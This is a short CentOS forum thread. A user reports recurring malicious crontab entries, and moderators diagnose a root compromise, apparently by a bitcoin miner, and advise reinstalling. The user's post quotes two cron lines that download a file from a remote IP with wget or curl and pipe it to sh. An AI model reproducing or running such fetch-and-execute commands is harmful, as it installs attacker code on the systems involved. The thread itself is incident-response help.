tasks Cron Infectado

Support for security such as Firewalls and securing linux
Post Reply
jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

tasks Cron Infectado

Post by jrguzman23 » 2017/10/24 16:44:33

problems with crontab tasks.

good day.

I have problems with a centos server that cron tasks are restored and creates the following tasks.
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server. :?

User avatar
TrevorH
Forum Moderator
Posts: 23203
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: tasks Cron Infectado

Post by TrevorH » 2017/10/24 17:04:23

If that is root's crontab then you need to backup your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.

The code there appears to be a bitcoin miner.

You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
CentOS 5 died in March 2017 - migrate NOW!
Full time Geek, part time moderator. Use the FAQ Luke

User avatar
avij
Forum Moderator
Posts: 2618
Joined: 2010/12/01 19:25:52
Location: Helsinki, Finland
Contact:

Re: tasks Cron Infectado

Post by avij » 2017/10/24 17:16:43

For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.

jrguzman23
Posts: 2
Joined: 2017/10/24 16:27:17

Re: tasks Cron Infectado

Post by jrguzman23 » 2017/10/24 18:43:38

thank you very much

Post Reply